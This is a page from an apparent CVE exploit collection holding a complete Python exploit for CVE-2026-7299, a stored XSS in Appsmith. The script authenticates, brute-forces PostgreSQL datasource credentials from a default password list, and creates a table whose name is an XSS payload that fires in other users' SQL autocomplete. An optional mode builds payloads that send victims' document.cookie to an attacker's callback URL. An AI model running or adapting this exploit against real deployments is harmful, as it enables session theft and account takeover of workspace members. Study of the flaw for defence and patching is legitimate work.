5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
Appsmith Stored XSS via SQL Autocomplete (CVE-2026-7299)
"""

import argparse
import json
import random
import string
import sys
import requests
import urllib3

# Certificate verification can be turned off with -k/--no-verify-ssl (see
# main()); suppress urllib3's InsecureRequestWarning globally so it does not
# clutter the tool's own output.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class C:
    """ANSI escape sequences used to colour terminal output.

    Plain names select a foreground colour, ``B``-prefixed names are the same
    colour codes combined with attribute ``1`` (the code used by ``BOLD``),
    and ``END`` is the ``0`` code emitted after coloured text.
    """

    _CSI = "\033["  # prefix shared by every sequence below

    # Foreground colours.
    RED = f"{_CSI}91m"
    GREEN = f"{_CSI}92m"
    YELLOW = f"{_CSI}93m"
    BLUE = f"{_CSI}94m"
    PURPLE = f"{_CSI}95m"
    CYAN = f"{_CSI}96m"
    WHITE = f"{_CSI}97m"
    GREY = f"{_CSI}90m"

    # Same colours with the bold attribute.
    BRED = f"{_CSI}1;91m"
    BGREEN = f"{_CSI}1;92m"
    BYELLOW = f"{_CSI}1;93m"
    BBLUE = f"{_CSI}1;94m"
    BPURPLE = f"{_CSI}1;95m"
    BCYAN = f"{_CSI}1;96m"
    BWHITE = f"{_CSI}1;97m"

    # Attributes without a colour, and the terminator.
    BOLD = f"{_CSI}1m"
    DIM = f"{_CSI}2m"
    END = f"{_CSI}0m"


class out:
    """Static helpers that print indented, bullet-prefixed status lines.

    Every helper takes a ``level`` that is turned into two spaces of
    indentation per level; the bullet colour distinguishes the message kind.
    """

    @staticmethod
    def _pad(level):
        # Two spaces per indentation level.
        return "  " * level

    @staticmethod
    def _bullet(level, colour):
        # Indentation followed by a bullet in *colour*, then a colour reset.
        return f"{out._pad(level)}{colour}\u2022{C.END}"

    @staticmethod
    def success(msg, level=1):
        """Print *msg* after a bold green bullet."""
        prefix = out._bullet(level, C.BGREEN)
        print(f"{prefix} {msg}")

    @staticmethod
    def error(msg, level=1):
        """Print *msg* in red after a bold red bullet."""
        prefix = out._bullet(level, C.BRED)
        print(f"{prefix} {C.RED}{msg}{C.END}")

    @staticmethod
    def warn(msg, level=1):
        """Print *msg* in yellow after a bold yellow bullet."""
        prefix = out._bullet(level, C.BYELLOW)
        print(f"{prefix} {C.YELLOW}{msg}{C.END}")

    @staticmethod
    def info(msg, level=1):
        """Print *msg* after a bold cyan bullet."""
        prefix = out._bullet(level, C.BCYAN)
        print(f"{prefix} {msg}")

    @staticmethod
    def step(msg, level=1):
        """Print *msg* after a bold purple bullet."""
        prefix = out._bullet(level, C.BPURPLE)
        print(f"{prefix} {msg}")

    @staticmethod
    def detail(label, value, level=2):
        """Print a grey ``label:`` followed by an uncoloured *value*."""
        indent = out._pad(level)
        print(f"{indent}{C.GREY}\u2022 {label}:{C.END} {value}")

    @staticmethod
    def dim(msg, level=2):
        """Print the bullet and *msg* entirely in grey."""
        indent = out._pad(level)
        print(f"{indent}{C.GREY}\u2022 {msg}{C.END}")

    @staticmethod
    def progress(msg, level=2):
        """Rewrite the current terminal line with a grey status message.

        Writes a carriage return first and no newline, so successive calls
        overwrite each other; the trailing ``\\033[K`` sequence follows the
        message, and stdout is flushed immediately.
        """
        indent = out._pad(level)
        line = f"\r{indent}{C.GREY}\u2022 {msg}{C.END}\033[K"
        sys.stdout.write(line)
        sys.stdout.flush()

    @staticmethod
    def blank():
        """Print an empty line."""
        print()


# ASCII-art banner printed once by main() before argument parsing. It is an
# f-string, so the colour codes from C are interpolated when the module loads.
BANNER = f'''

{C.PURPLE}M""MMMM""M MP""""""`MM MP""""""`MM {C.END} {C.BOLD}  MP""""""`MM M"""""`'"""`YM M""M M""""""""M M""MMMMM""MM 
{C.PURPLE}M  `MM'  M M  mmmmm..M M  mmmmm..M {C.END}   {C.BOLD}M  mmmmm..M M  mm.  mm.  M M  M Mmmm  mmmM M  MMMMM  MM 
{C.PURPLE}MM.    .MM M.      `YM M.      `YM {C.END}   {C.BOLD}M.      `YM M  MMM  MMM  M M  M MMMM  MMMM M         `M 
{C.PURPLE}M  .mm.  M MMMMMMM.  M MMMMMMM.  M {C.END}   {C.BOLD}MMMMMMM.  M M  MMM  MMM  M M  M MMMM  MMMM M  MMMMM  MM 
{C.PURPLE}M  MMMM  M M. .MMM'  M M. .MMM'  M {C.END}   {C.BOLD}M. .MMM'  M M  MMM  MMM  M M  M MMMM  MMMM M  MMMMM  MM 
{C.PURPLE}M  MMMM  M Mb.     .dM Mb.     .dM {C.END}   {C.BOLD}Mb.     .dM M  MMM  MMM  M M  M MMMM  MMMM M  MMMMM  MM 
{C.PURPLE}MMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMM {C.END}   {C.BOLD}MMMMMMMMMMM MMMMMMMMMMMMMM MMMM MMMMMMMMMM MMMMMMMMMMMM 
                            
                                    {C.BGREEN}@stuub{C.END}
                             Exploiting CVE-2026-7299
                            Stored XSS - Appsmith v1.98                                                                        

'''

# Built-in payloads keyed by name. main() falls back to "alert" when neither
# --custom-payload nor --callback-url is given.
PAYLOADS = {
    "alert": '<img src=x onerror=alert(document.domain)>',
}


class AppsmithExploit:
    def __init__(self, base_url, email, password, verify_ssl=False):
        """Record the target and credentials and prepare one shared HTTP session.

        Any trailing "/" is removed from *base_url* so endpoint paths can be
        appended directly. *verify_ssl* is assigned to the session's
        ``verify`` attribute.
        """
        self.base_url = base_url.rstrip("/")
        self.email, self.password = email, password

        http = requests.Session()
        http.verify = verify_ssl
        self.session = http

        # Unknown until a response sets the XSRF-TOKEN cookie (_update_xsrf).
        self.xsrf_token = None

    def _headers(self):
        h = {"Content-Type": "application/json"}
        if self.xsrf_token:
            h["X-XSRF-TOKEN"] = self.xsrf_token
        return h

    def _update_xsrf(self, response):
        token = response.cookies.get("XSRF-TOKEN")
        if token:
            self.xsrf_token = token

    def login(self):
        """Authenticate the shared session with the configured credentials.

        Steps: GET /api/v1/users/me to pick up an XSRF cookie, POST the
        form-encoded credentials to /api/v1/login without following
        redirects, then GET /api/v1/users/me again to confirm the session is
        no longer anonymous.

        Returns:
            The "data" object of the final /users/me response.

        Exits the process with status 1 when the login POST returns a status
        other than 200/301/302, when the profile response is not a JSON
        object with a "data" object, or when the profile is still anonymous.
        """
        out.step("Authenticating...")

        r = self.session.get(f"{self.base_url}/api/v1/users/me")
        self._update_xsrf(r)

        r = self.session.post(
            f"{self.base_url}/api/v1/login",
            headers={"Content-Type": "application/x-www-form-urlencoded",
                     "X-XSRF-TOKEN": self.xsrf_token or ""},
            data={"username": self.email, "password": self.password},
            allow_redirects=False,
        )
        self._update_xsrf(r)

        if r.status_code not in (200, 301, 302):
            out.error("Login failed", level=2)
            out.dim(r.text[:200])
            sys.exit(1)

        r = self.session.get(f"{self.base_url}/api/v1/users/me",
                             headers=self._headers())
        self._update_xsrf(r)

        # Response.json() raises a ValueError subclass on a non-JSON body
        # (e.g. an HTML error page); report it instead of dumping a traceback.
        try:
            data = r.json()
        except ValueError:
            out.error("Login failed, unexpected non-JSON response", level=2)
            out.dim(r.text[:200])
            sys.exit(1)

        # Guard against a missing or null "data" member as well as an
        # explicitly anonymous profile.
        profile = data.get("data") if isinstance(data, dict) else None
        if not isinstance(profile, dict) or profile.get("isAnonymous", True):
            out.error("Login failed, still anonymous", level=2)
            sys.exit(1)

        email = profile.get("email", "unknown")
        out.success(f"Authenticated as {C.BGREEN}{email}{C.END}", level=2)
        return profile
        

    def get_workspace_context(self):
        """Obtain a workspace and create a fresh application inside it.

        A workspace named ``poc-<suffix>`` is created first; if that request
        does not return 200/201, the first entry of
        /api/v1/workspaces/home is used instead. An application named
        ``app-<suffix>`` is then created in the chosen workspace.

        Returns:
            ``(workspace_id, app_id, page_id)`` where ``page_id`` is the
            first page's "id", or its "baseId" when "id" is empty.

        Exits with status 1 when no workspace is available, the application
        cannot be created, or the new application lists no pages.
        """
        tag = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
        ok_codes = (200, 201)

        out.step("Setting up workspace...")
        r = self.session.post(
            f"{self.base_url}/api/v1/workspaces",
            headers=self._headers(),
            json={"name": f"poc-{tag}"})
        self._update_xsrf(r)

        if r.status_code in ok_codes:
            workspace = r.json()["data"]
        else:
            # Creation was refused: reuse the first workspace already visible.
            out.warn(f"Workspace creation failed ({r.status_code}), using existing", level=2)
            r = self.session.get(f"{self.base_url}/api/v1/workspaces/home",
                                 headers=self._headers())
            self._update_xsrf(r)
            existing = r.json().get("data", [])
            if not existing:
                out.error("No workspaces found", level=2)
                sys.exit(1)
            workspace = existing[0]

        workspace_id = workspace["id"]
        out.success(f"Workspace {C.BWHITE}{workspace.get('name', 'N/A')}{C.END}", level=2)

        r = self.session.post(
            f"{self.base_url}/api/v1/applications",
            headers=self._headers(),
            json={"name": f"app-{tag}", "workspaceId": workspace_id})
        self._update_xsrf(r)

        if r.status_code not in ok_codes:
            out.error(f"Failed to create application: {r.status_code}", level=2)
            sys.exit(1)

        app = r.json()["data"]
        app_id = app["id"]
        pages = app.get("pages", [])
        if not pages:
            out.error("No pages found", level=2)
            sys.exit(1)

        first_page = pages[0]
        page_id = first_page.get("id") or first_page.get("baseId")
        out.success(f"Application {C.BWHITE}{app.get('name', 'N/A')}{C.END}", level=2)

        return workspace_id, app_id, page_id
        

    def find_postgres_datasource(self, workspace_id):
        """Return the first PostgreSQL datasource in the workspace that is writable.

        A datasource qualifies when its "pluginName" is "postgresql"
        (case-insensitive) and one of its storages has connection mode
        "READ_WRITE"; a storage without a mode is treated as READ_WRITE.

        Returns:
            The datasource dict from the listing, or ``None`` when the
            listing's responseMeta status is not 200 or nothing qualifies.
        """
        out.step("Searching for writable PostgreSQL datasources...")

        r = self.session.get(
            f"{self.base_url}/api/v1/datasources?workspaceId={workspace_id}",
            headers=self._headers())
        self._update_xsrf(r)

        listing = r.json()
        status = listing.get("responseMeta", {}).get("status")
        if status != 200:
            out.warn("Datasource listing failed", level=2)
            return None

        for ds in listing.get("data", []):
            if ds.get("pluginName", "").lower() != "postgresql":
                continue
            for storage in ds.get("datasourceStorages", {}).values():
                connection = storage.get("datasourceConfiguration", {}).get("connection", {})
                if connection.get("mode", "READ_WRITE") == "READ_WRITE":
                    out.success(f"Found {C.BCYAN}{ds['name']}{C.END}", level=2)
                    return ds
            # Reached when no storage of this datasource was writable.
            out.dim(f"{ds['name']} is READ_ONLY, skipping", level=2)

        out.warn("No writable PostgreSQL datasource found", level=2)
        return None

    # Default candidate values used by auto_discover_datasource() for every
    # connection field the caller did not supply explicitly.
    dfl_db_hosts = [
        "host.docker.internal", "172.17.0.1", "postgres", "postgresql",
        "db", "database", "appsmith-pg", "localhost",
    ]
    dfl_db_ports = [5432]
    dfl_db_names = ["postgres", "testdb", "appsmith"]
    dfl_db_user = ["postgres", "appsmith", "admin"]
    dfl_db_pass = ["postgres", "password", "test123", "appsmith", "admin"]

    def test_datasource_connection(self, plugin_id, workspace_id, host, port,
                                   db_name, username, password):
        """Ask /api/v1/datasources/test whether the given connection works.

        Returns:
            The "success" value from the response's "data" object, or
            ``False`` when the request or response handling raises (the
            request uses a 10 second timeout).
        """
        ds_config = {
            "connection": {"mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"}},
            "endpoints": [{"host": host, "port": port}],
            "authentication": {
                "databaseName": db_name,
                "username": username,
                "password": password,
            },
            "properties": [None, {"key": "Connection method", "value": "STANDARD"}],
        }
        request_body = {
            "pluginId": plugin_id,
            "datasourceConfiguration": ds_config,
            "workspaceId": workspace_id,
        }
        request_headers = {**self._headers(), "X-Appsmith-EnvironmentId": "unused_env"}

        # Best-effort probe: any failure simply counts as "connection not usable".
        try:
            r = self.session.post(
                f"{self.base_url}/api/v1/datasources/test",
                headers=request_headers, json=request_body, timeout=10)
            self._update_xsrf(r)
            verdict = r.json().get("data", {}).get("success", False)
        except Exception:
            return False
        return verdict

    def auto_discover_datasource(self, workspace_id, db_host=None, db_port=None,
                                  db_name=None, db_user=None, db_pass=None):
        """Try connection settings until one passes the datasource test.

        Each explicitly supplied (truthy) argument pins that field to a
        single value; otherwise the matching ``dfl_db_*`` class list is used.
        Combinations are tried with host as the outermost and password as the
        innermost varying field.

        Returns:
            The datasource created by create_datasource() for the first
            combination that test_datasource_connection() accepts.

        Exits with status 1 when no combination works.
        """
        out.step("Auto-discovering PostgreSQL connection...")
        plugin_id = self.get_postgres_plugin_id(workspace_id)

        def choices(explicit, defaults):
            # A caller-supplied value replaces the whole default list.
            return [explicit] if explicit else defaults

        hosts = choices(db_host, self.dfl_db_hosts)
        ports = choices(db_port, self.dfl_db_ports)
        names = choices(db_name, self.dfl_db_names)
        users = choices(db_user, self.dfl_db_user)
        passes = choices(db_pass, self.dfl_db_pass)

        attempts = (
            (host, port, name, user, pwd)
            for host in hosts
            for port in ports
            for name in names
            for user in users
            for pwd in passes
        )

        for host, port, name, user, pwd in attempts:
            combo = f"{user}:{pwd}@{host}:{port}/{name}"
            out.progress(f"Trying {combo:<50}")
            if not self.test_datasource_connection(
                    plugin_id, workspace_id, host, port, name, user, pwd):
                continue
            print()  # finish the in-place progress line
            out.success(f"Connection found {C.BGREEN}{combo}{C.END}", level=2)
            return self.create_datasource(
                workspace_id, host, port, name, user, pwd)

        print()
        out.error("No valid PostgreSQL connection found", level=2)
        out.dim("Provide credentials with --db-host, --db-user, --db-pass, --db-name")
        sys.exit(1)

    def get_postgres_plugin_id(self, workspace_id):
        """Return the id of the first plugin whose name or package name mentions "postgres".

        The match is case-insensitive. Exits with status 1 when the plugin
        listing for *workspace_id* contains no such plugin.
        """
        r = self.session.get(
            f"{self.base_url}/api/v1/plugins?workspaceId={workspace_id}",
            headers=self._headers())
        self._update_xsrf(r)

        for plugin in r.json().get("data", []):
            labels = (
                plugin.get("name", "").lower(),
                plugin.get("packageName", "").lower(),
            )
            if any("postgres" in label for label in labels):
                return plugin["id"]

        out.error("PostgreSQL plugin not found", level=2)
        sys.exit(1)

    def create_datasource(self, workspace_id, db_host, db_port, db_name,
                          db_user, db_pass):
        """Create a READ_WRITE PostgreSQL datasource in the workspace.

        The datasource is named ``ds-`` plus the first eight characters of
        *workspace_id* and stores its configuration under the "unused_env"
        environment key; the port is sent as a string.

        Returns:
            The "data" object of the creation response.

        Exits with status 1 when the response status is not 201.
        """
        out.step(f"Creating datasource {C.BWHITE}{db_host}:{db_port}/{db_name}{C.END}", level=2)

        plugin_id = self.get_postgres_plugin_id(workspace_id)

        ds_config = {
            "properties": [
                None,
                {"key": "Connection method", "value": "STANDARD"}
            ],
            "connection": {
                "mode": "READ_WRITE",
                "ssl": {"authType": "DEFAULT"}
            },
            "endpoints": [{"port": str(db_port), "host": db_host}],
            "sshProxy": {"endpoints": [{"port": "22"}]},
            "authentication": {
                "databaseName": db_name,
                "username": db_user,
                "password": db_pass,
            },
            "url": "",
        }
        storage = {
            "datasourceConfiguration": ds_config,
            "datasourceId": "",
            "environmentId": "unused_env",
            "isConfigured": True,
        }
        request_body = {
            "pluginId": plugin_id,
            "datasourceStorages": {"unused_env": storage},
            "name": f"ds-{workspace_id[:8]}",
            "workspaceId": workspace_id,
        }

        r = self.session.post(f"{self.base_url}/api/v1/datasources",
                              headers=self._headers(), json=request_body)
        self._update_xsrf(r)

        if r.status_code != 201:
            out.error(f"Failed to create datasource: {r.status_code}", level=3)
            out.dim(r.text[:300], level=3)
            sys.exit(1)

        created = r.json()["data"]
        out.success(f"Datasource created {C.GREY}({created['id']}){C.END}", level=3)
        return created

    def create_action(self, datasource, app_id, page_id, workspace_id,
                      xss_payload):
        """Create the query action "xss_poc_query" on the given page.

        The action body is a CREATE TABLE statement that uses *xss_payload*,
        wrapped in double quotes, as the table name.

        Returns:
            The id of the created action.

        Exits with status 1 when the response status is not 200/201.
        """
        out.step("Injecting XSS payload...")

        sql = f'CREATE TABLE "{xss_payload}" (id serial primary key);'
        plugin_id = datasource["pluginId"]
        datasource_ref = {
            "id": datasource["id"],
            "name": datasource["name"],
            "pluginId": plugin_id,
        }
        action_config = {
            "timeoutInMillisecond": 10000,
            "paginationType": "NONE",
            "encodeParamsToggle": True,
            "pluginSpecifiedTemplates": [{"value": True}],
            "body": sql,
        }
        request_body = {
            "applicationId": app_id,
            "workspaceId": workspace_id,
            "pluginType": "DB",
            "pluginId": plugin_id,
            "datasource": datasource_ref,
            "pageId": page_id,
            "actionConfiguration": action_config,
            "name": "xss_poc_query",
        }

        r = self.session.post(f"{self.base_url}/api/v1/actions",
                              headers=self._headers(), json=request_body)
        self._update_xsrf(r)

        if r.status_code not in (200, 201):
            out.error(f"Failed to create action: {r.status_code}", level=2)
            out.dim(r.text[:500], level=2)
            sys.exit(1)

        action_id = r.json()["data"]["id"]
        out.success(f"Action created {C.GREY}({action_id}){C.END}", level=2)
        out.detail("SQL", f"{C.BWHITE}{sql}{C.END}")
        return action_id

    def execute_action(self, action_id):
        """Run the stored action through /api/v1/actions/execute.

        The request is a hand-built multipart/form-data body with a single
        "executeActionDTO" part containing the JSON execution descriptor.

        Returns:
            The response's "isExecutionSuccess" value; this is falsy when the
            query failed only because the table already exists.

        Exits with status 1 on a non-200 response or on any other query error.
        """
        out.step("Executing query...", level=2)

        execute_dto = json.dumps({
            "actionId": action_id,
            "viewMode": False,
            "paramProperties": {},
        })

        boundary = "----ExploitBoundary"
        # Every part line, including the closing delimiter, ends with CRLF.
        body = "\r\n".join([
            f"--{boundary}",
            'Content-Disposition: form-data; name="executeActionDTO"',
            "",
            execute_dto,
            f"--{boundary}--",
            "",
        ])

        headers = {
            "Content-Type": f"multipart/form-data; boundary={boundary}",
            "X-Appsmith-EnvironmentId": "unused_env",
        }
        if self.xsrf_token:
            headers["X-XSRF-TOKEN"] = self.xsrf_token

        r = self.session.post(
            f"{self.base_url}/api/v1/actions/execute",
            headers=headers, data=body.encode())
        self._update_xsrf(r)

        if r.status_code != 200:
            out.error(f"Execution failed: {r.status_code}", level=3)
            sys.exit(1)

        outcome = r.json()
        success = outcome.get("data", {}).get("isExecutionSuccess", False)
        if success:
            out.success("Malicious table created", level=3)
            return success

        error = outcome.get("data", {}).get("body", "Unknown error")
        if "already exists" not in str(error):
            out.error(f"Query error: {error}", level=3)
            sys.exit(1)

        out.warn("Table already exists (payload previously injected)", level=3)
        return success


    def refresh_structure(self, datasource_id):
        """Reload the datasource structure and report whether the payload table is listed.

        Requests /api/v1/datasources/<id>/structure with ``ignoreCache=true``
        and scans the returned table names for one containing "<" or
        "onerror".

        Returns:
            ``True`` only when such a table is present; ``False`` when the
            request does not return 200, the body is not usable JSON, or no
            matching table is listed. (Previously every path returned
            ``True``, so the result carried no information.)
        """
        out.step("Refreshing datasource structure...")

        r = self.session.get(
            f"{self.base_url}/api/v1/datasources/{datasource_id}/structure"
            f"?ignoreCache=true",
            headers=self._headers())
        self._update_xsrf(r)

        if r.status_code != 200:
            out.warn(f"Structure refresh returned {r.status_code}", level=2)
            return False

        # Response.json() raises a ValueError subclass on a non-JSON body.
        try:
            body = r.json()
        except ValueError:
            out.warn("Structure response was not valid JSON", level=2)
            return False

        # "data" and "tables" may be absent or null; treat both as "no tables".
        data = body.get("data") if isinstance(body, dict) else None
        tables = (data.get("tables") if isinstance(data, dict) else None) or []
        out.success(f"{C.BWHITE}{len(tables)}{C.END} tables loaded into autocomplete", level=2)

        for t in tables:
            name = t.get("name") or ""
            if "<" in name or "onerror" in name:
                out.success(f"Poisoned table: {C.BGREEN}{name[:70]}{C.END}", level=2)
                return True

        out.warn("Payload table not found in refreshed structure", level=2)
        return False

    def run(self, xss_payload, db_host=None, db_port=None, db_name=None,
            db_user=None, db_pass=None):
        """Run the whole flow end to end and print a summary.

        Order of operations: login, workspace/application setup, datasource
        selection (an existing writable PostgreSQL datasource, otherwise
        auto-discovery using the optional ``db_*`` overrides), action
        creation and execution, and finally a structure refresh.

        Any step may terminate the process via ``sys.exit(1)``; the return
        value of the structure refresh is not inspected here.
        """
        self.login()
        out.blank()

        workspace_id, app_id, page_id = self.get_workspace_context()
        out.blank()

        ds = self.find_postgres_datasource(workspace_id)
        if not ds:
            ds = self.auto_discover_datasource(
                workspace_id, db_host, db_port, db_name, db_user, db_pass)
        out.blank()

        action_id = self.create_action(ds, app_id, page_id, workspace_id,
                                       xss_payload)
        self.execute_action(action_id)
        out.blank()

        self.refresh_structure(ds["id"])

        out.blank()
        out.success(f"{C.BGREEN}Exploit complete{C.END}")
        out.dim("XSS payload stored as a database table name.")
        # Wording fixed: the original message read "Will fires when ...".
        out.dim("Fires when a workspace member triggers SQL autocomplete.")
        out.blank()
        out.detail("Trigger", f"Type {C.BWHITE}SELECT * FROM{C.END} in the SQL editor")
        out.detail("Payload", f"{C.BWHITE}{xss_payload}{C.END}")
        out.detail("Datasource", f"{C.BWHITE}{ds['name']}{C.END} {C.GREY}({ds['id']}){C.END}")
        out.blank()


def main():
    """Command-line entry point: parse arguments, pick a payload, run the flow.

    Payload selection, in priority order:
      1. --custom-payload, used as given (a warning is printed when it is
         longer than 63 characters).
      2. --callback-url, from which three candidate payloads are built; the
         last candidate that is at most 63 characters long is used, and the
         process exits with status 1 when none fits.
      3. The built-in "alert" payload.
    """
    print(BANNER)

    cli = argparse.ArgumentParser(
        description="CVE-2026-7299 - Appsmith Stored XSS via SQL Autocomplete")
    add = cli.add_argument

    # Target and account.
    add("-u", "--url", required=True,
        help="Appsmith base URL (e.g. http://localhost:4444)")
    add("-e", "--email", required=True,
        help="Attacker's Appsmith email")
    add("-p", "--password", required=True,
        help="Attacker's Appsmith password")

    # Payload selection.
    add("-c", "--callback-url",
        help="Callback URL for cookie exfiltration")
    add("-x", "--custom-payload",
        help="Custom XSS payload string")

    # Optional database connection overrides.
    add("-H", "--db-host", help="PostgreSQL host")
    add("-P", "--db-port", type=int, default=5432,
        help="PostgreSQL port (default: 5432)")
    add("-d", "--db-name", help="PostgreSQL database name")
    add("-U", "--db-user", help="PostgreSQL username")
    add("-W", "--db-pass", help="PostgreSQL password")

    add("-k", "--no-verify-ssl", action="store_true",
        help="Disable SSL verification")

    args = cli.parse_args()
    limit = 63

    if args.custom_payload:
        xss_payload = args.custom_payload
        if len(xss_payload) > limit:
            out.warn(f"Custom payload is {len(xss_payload)} chars (PostgreSQL limit: 63)")
            out.dim("Payload will be truncated by the database")
    elif args.callback_url:
        cb = args.callback_url.rstrip("/")
        short_cb = cb.replace("https://", "//").replace("http://", "//")
        candidates = [
            f"<img src=x onerror=fetch('{cb}?c='+document.cookie)>",
            f"<img src=x onerror=fetch('{cb}?'+document.cookie)>",
            f"<img src=x onerror=fetch('{short_cb}?'+document.cookie)>",
        ]
        # The last candidate within the limit is the one that gets used.
        fitting = [cand for cand in candidates if len(cand) <= limit]
        xss_payload = fitting[-1] if fitting else None
        if not xss_payload:
            max_url = 63 - len("<img src=x onerror=fetch('//?'+document.cookie)>")
            out.error("Callback URL too long for PostgreSQL 63-char identifier limit")
            out.dim(f"Max URL length: ~{max_url} chars (yours: {len(short_cb)})")
            out.dim("Use port 80 or a short domain/ngrok URL")
            sys.exit(1)
        out.info(f"Callback: {C.BWHITE}{xss_payload}{C.END} {C.GREY}({len(xss_payload)}/63){C.END}")
    else:
        xss_payload = PAYLOADS["alert"]

    out.blank()

    exploit = AppsmithExploit(
        base_url=args.url,
        email=args.email,
        password=args.password,
        verify_ssl=not args.no_verify_ssl,
    )
    exploit.run(
        xss_payload=xss_payload,
        db_host=args.db_host,
        db_port=args.db_port,
        db_name=args.db_name,
        db_user=args.db_user,
        db_pass=args.db_pass,
    )


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C: print a short notice instead of a traceback, then exit 0.
        notice = f"\n\n  {C.BYELLOW}\u2022{C.END} {C.GREY}Interrupted.{C.END}\n"
        print(notice)
        sys.exit(0)